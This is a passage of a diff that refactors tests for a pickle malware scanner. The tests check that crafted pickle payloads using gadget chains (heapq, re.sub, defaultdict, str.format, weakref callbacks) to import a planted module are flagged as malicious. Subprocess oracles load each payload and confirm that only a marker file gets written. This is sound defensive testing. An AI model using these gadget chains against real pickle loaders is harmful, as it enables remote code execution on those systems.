"Counter"), @@ -7205,16 +6440,7 @@ def test_scan_bytes_keeps_operator_ior_counter_receiver_call_iterator_lazy(tmp_p if marker.exists(): raise SystemExit("marker was written") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, - ) - assert result.returncode == 0, result.stderr + _assert_isolated_python(tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()]) assert not marker.exists() @@ -7223,14 +6449,7 @@ def test_scan_bytes_blocks_heapq_merge_call_iterator_consumption_rce(tmp_path: P module_dir.mkdir() marker = tmp_path / "heapq_merge_call_iterator_marker" marker_content = "pydoc-owned" - (module_dir / "pydoc.py").write_text( - "from pathlib import Path\n" - f"Path({str(marker)!r}).write_text({marker_content!r})\n" - "_values = ['owned-value', 'stop']\n" - "def help(*args, **kwargs):\n" - " return _values.pop(0) if _values else 'stop'\n", - encoding="utf-8", - ) + _write_iterator_pydoc(module_dir, marker, marker_content, "['owned-value', 'stop']") payload = _builtins_help_call_iterator_heapq_merge_next_payload() report = scan_bytes(payload, source="heapq-merge-call-iterator-rce.pkl") @@ -7272,16 +6491,9 @@ def test_scan_bytes_blocks_heapq_merge_call_iterator_consumption_rce(tmp_path: P if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -7342,16 +6554,9 @@ def test_scan_bytes_blocks_heapq_key_callback_rce(tmp_path: Path, name: str) -> if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -7399,16 +6604,7 @@ def test_scan_bytes_keeps_heapq_empty_iterable_key_callback_lazy(tmp_path: Path, if marker.exists(): raise SystemExit("marker was written") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, - ) - assert result.returncode == 0, result.stderr + _assert_isolated_python(tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()]) assert not marker.exists() @@ -7482,16 +6678,9 @@ def test_scan_bytes_blocks_re_sub_replacement_callback_rce( if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content, name], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content, name] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -7560,16 +6749,9 @@ def test_scan_bytes_keeps_re_sub_no_match_callback_lazy( if marker.exists(): raise SystemExit("marker was written") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), name, expected_value], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), name, expected_value] ) - assert result.returncode == 0, result.stderr assert not marker.exists() @@ -7643,16 +6825,9 @@ def test_scan_bytes_blocks_re_pattern_sub_replacement_callback_rce( if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content, name], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content, name] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -7717,16 +6892,9 @@ def test_scan_bytes_keeps_re_pattern_sub_no_match_callback_lazy( if marker.exists(): raise SystemExit("marker was written") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), name, expected_value], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), name, expected_value] ) - assert result.returncode == 0, result.stderr assert not marker.exists() @@ -7799,7 +6967,8 @@ def test_scan_bytes_blocks_re_scanner_action_callback_rce( if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( + _assert_isolated_python( + tmp_path, [ sys.executable, "-c", @@ -7811,14 +6980,7 @@ def test_scan_bytes_blocks_re_scanner_action_callback_rce( expected_result[0][0], expected_result[1], ], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -7879,16 +7041,9 @@ def test_scan_bytes_keeps_re_scanner_no_match_action_callback_lazy( if marker.exists(): raise SystemExit("marker was written") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), expected_result[1]], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), expected_result[1]] ) - assert result.returncode == 0, result.stderr assert not marker.exists() @@ -7945,16 +7100,9 @@ def test_scan_bytes_blocks_future_done_callback_rce(tmp_path: Path) -> None: if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -8011,16 +7159,9 @@ def test_scan_bytes_blocks_done_future_add_callback_rce(tmp_path: Path) -> None: if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -8094,16 +7235,7 @@ def test_scan_bytes_keeps_future_pending_callback_lazy(tmp_path: Path) -> None: if marker.exists(): raise SystemExit("marker was written") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, - ) - assert result.returncode == 0, result.stderr + _assert_isolated_python(tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()]) assert not marker.exists() @@ -8159,16 +7291,9 @@ def test_scan_bytes_blocks_weakref_lifetime_callback_rce(tmp_path: Path, name: s if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -8242,16 +7367,9 @@ def test_scan_bytes_blocks_weakmethod_lifetime_callback_rce(tmp_path: Path) -> N if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -8339,7 +7457,8 @@ def test_scan_bytes_blocks_tokenize_readline_callback_rce( if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( + _assert_isolated_python( + tmp_path, [ sys.executable, "-c", @@ -8350,14 +7469,7 @@ def test_scan_bytes_blocks_tokenize_readline_callback_rce( marker_content, str(expected_len), ], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -8416,16 +7528,7 @@ def test_scan_bytes_keeps_tokenize_readline_callback_lazy( if marker.exists(): raise SystemExit("marker was written") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, - ) - assert result.returncode == 0, result.stderr + _assert_isolated_python(tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()]) assert not marker.exists() @@ -8487,16 +7590,9 @@ def test_scan_bytes_blocks_defaultdict_factory_getitem_rce(tmp_path: Path) -> No if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -8570,16 +7666,9 @@ def test_scan_bytes_blocks_defaultdict_method_factory_rce( if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -8652,16 +7741,9 @@ def test_scan_bytes_blocks_mapping_wrapper_defaultdict_factory_rce( if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -8757,16 +7839,7 @@ def test_scan_bytes_keeps_chainmap_shadowed_defaultdict_lookup_clean(tmp_path: P if marker.exists(): raise SystemExit("default factory unexpectedly imported pydoc") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, - ) - assert result.returncode == 0, result.stderr + _assert_isolated_python(tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()]) assert not marker.exists() @@ -8823,16 +7896,9 @@ def test_scan_bytes_blocks_deep_mapping_proxy_defaultdict_factory_rce(tmp_path: if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -8894,16 +7960,9 @@ def test_scan_bytes_blocks_format_map_defaultdict_factory_rce(tmp_path: Path) -> if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -9021,16 +8080,7 @@ def test_scan_bytes_keeps_str_format_chainmap_shadowed_defaultdict_lookup_clean( if marker.exists(): raise SystemExit("default factory unexpectedly imported pydoc") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, - ) - assert result.returncode == 0, result.stderr + _assert_isolated_python(tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()]) assert not marker.exists() @@ -9087,16 +8137,9 @@ def test_scan_bytes_blocks_nested_str_format_defaultdict_lookup_rce(tmp_path: Pa if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -9153,16 +8196,9 @@ def test_scan_bytes_blocks_nested_setitems_str_format_defaultdict_lookup_rce(tmp if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -9219,16 +8255,9 @@ def test_scan_bytes_blocks_nested_format_map_defaultdict_lookup_rce(tmp_path: Pa if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -9288,7 +8317,8 @@ def test_scan_bytes_blocks_nested_formatter_defaultdict_lookup_rce(tmp_path: Pat if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( + _assert_isolated_python( + tmp_path, [ sys.executable, "-c", @@ -9299,14 +8329,7 @@ def test_scan_bytes_blocks_nested_formatter_defaultdict_lookup_rce(tmp_path: Pat marker_content, expected_result, ], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -9371,16 +8394,9 @@ def test_scan_bytes_blocks_nested_wrapped_str_format_defaultdict_lookup_rce( if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -9437,16 +8453,9 @@ def test_scan_bytes_blocks_memoized_nested_str_format_defaultdict_lookup_rce(tmp if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -9503,16 +8512,9 @@ def test_scan_bytes_blocks_str_format_unicode_decimal_chainmap_lookup_rce(tmp_pa if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -9565,16 +8567,7 @@ def test_scan_bytes_keeps_str_format_oversized_decimal_chainmap_lookup_clean(tmp if marker.exists(): raise SystemExit("default factory unexpectedly imported pydoc") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, - ) - assert result.returncode == 0, result.stderr + _assert_isolated_python(tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()]) assert not marker.exists() @@ -9661,16 +8654,7 @@ def test_scan_bytes_keeps_str_format_newer_unicode_decimal_chainmap_lookup_clean if marker.exists(): raise SystemExit("default factory unexpectedly imported pydoc") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, - ) - assert result.returncode == 0, result.stderr + _assert_isolated_python(tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex()]) assert not marker.exists() @@ -9714,16 +8698,9 @@ def test_scan_bytes_runtime_blocks_str_format_newer_unicode_decimal_chainmap_loo if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -9803,16 +8780,9 @@ def test_scan_bytes_blocks_operator_percent_defaultdict_factory_rce(tmp_path: Pa if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -9889,16 +8859,9 @@ def test_scan_bytes_blocks_template_defaultdict_factory_rce(tmp_path: Path, meth if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -9975,16 +8938,9 @@ def test_scan_bytes_blocks_formatter_vformat_defaultdict_factory_rce(tmp_path: P if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -10060,16 +9016,9 @@ def test_scan_bytes_blocks_formatter_private_vformat_defaultdict_factory_rce(tmp if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -10148,16 +9097,9 @@ def test_scan_bytes_blocks_ipaddress_format_protocol_dispatch_import_rce(tmp_pat if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -10221,16 +9163,9 @@ def test_scan_bytes_blocks_ipaddress_str_format_protocol_dispatch_import_rce(tmp if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -10318,16 +9253,9 @@ def test_scan_bytes_blocks_platform_processor_get_dynamic_fallback_rce(tmp_path: if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -10406,16 +9334,9 @@ def fake_open(path, *args, **kwargs): if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -10461,16 +9382,7 @@ def test_scan_bytes_blocks_typing_extensions_get_type_hints_annotation_rce(tmp_p if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, - ) - assert result.returncode == 0, result.stderr + _assert_isolated_python(tmp_path, [sys.executable, "-c", child_code, str(marker), payload.hex(), marker_content]) assert marker.read_text() == marker_content @@ -10544,16 +9456,9 @@ def test_scan_bytes_blocks_pyio_open_code_warning_import_side_effect_rce(tmp_pat if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -10601,16 +9506,9 @@ def test_scan_bytes_blocks_base64_main_import_side_effect_rce(tmp_path: Path) -> if marker.read_text() != marker_content: raise SystemExit("marker content mismatch") """ - result = subprocess.run( - [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content], - cwd=str(tmp_path.parent), - env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, - check=False, - capture_output=True, - text=True, - timeout=30, + _assert_isolated_python( + tmp_path, [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content] ) - assert result.returncode == 0, result.stderr assert marker.read_text() == marker_content @@ -10691,3 +9589,244 @@ def counting_parameter_controlled_names( assert "benchmod.Runner.execute" in resolved_calls assert calls == 1 + + +def _custom_meta_path_finder(module_name: str, marker: Path) -> Any: + class CustomMetaPathFinder: + @staticmethod + def find_spec( + fullname: str, + path: object | None = None, + target: object | None = None, + ) -> ModuleSpec | None: + del path, target + if fullname == module_name: + marker.write_text(fullname, encoding="utf-8") + return ModuleSpec(fullname, loader=None, origin="custom://module") + return None + + return CustomMetaPathFinder() + + +_EAGER_CALL_ITERATOR_ORACLE = """ +import pickle +import sys +from pathlib import Path + +module_dir = Path(sys.argv[1]) +marker = Path(sys.argv[2]) +payload = bytes.fromhex(sys.argv[3]) +marker_content = sys.argv[4] +expected_repr = sys.argv[5] + +if marker.exists(): + raise SystemExit("marker already exists before pickle execution") +sys.path.insert(0, str(module_dir)) +sys.modules.pop("pydoc", None) +result = pickle.loads(payload) +result_repr = repr(result) +expected_ordered_dict_repr = None +if expected_repr.startswith("OrderedDict(") and expected_repr.endswith(")"): + expected_ordered_dict_repr = expected_repr[len("OrderedDict(") : -1] +if result_repr != expected_repr and not ( + type(result).__name__ == "OrderedDict" and repr(dict(result)) == expected_ordered_dict_repr +): + raise SystemExit(f"expected {expected_repr}, got {result!r}") +if not marker.exists(): + raise SystemExit("marker was not written") +if marker.read_text() != marker_content: + raise SystemExit("marker content mismatch") +""" + + +def _assert_eager_call_iterator( + tmp_path: Path, + payload: bytes, + values_literal: str, + expected_repr: str, + marker_name: str, + source: str, + child_code: str, + requires_python_3_11_plus: bool = False, +) -> None: + module_dir = tmp_path / "modules" + module_dir.mkdir() + marker = tmp_path / marker_name + marker_content = "pydoc-owned" + _write_iterator_pydoc(module_dir, marker, marker_content, values_literal) + + report = scan_bytes(payload, source=source) + + assert report.verdict == SafetyVerdict.MALICIOUS + assert _has_critical_call_graph_finding( + report, + "_sitebuiltins", + "_Helper.__call__", + "builtins.__import__", + ) + assert any( + invocation.get("module") == "builtins" + and invocation.get("name") == "help" + and invocation.get("positional_arg_count") == 0 + for invocation in report.metadata.get("callable_invocations", []) + ) + + assert not marker.exists() + if requires_python_3_11_plus and sys.version_info < (3, 11): + return + + _assert_isolated_python( + tmp_path, + [sys.executable, "-c", child_code, str(module_dir), str(marker), payload.hex(), marker_content, expected_repr], + ) + assert marker.read_text() == marker_content + + +def _assert_format_protocol_dispatch(name: str) -> None: + import_references = [ + { + "module": 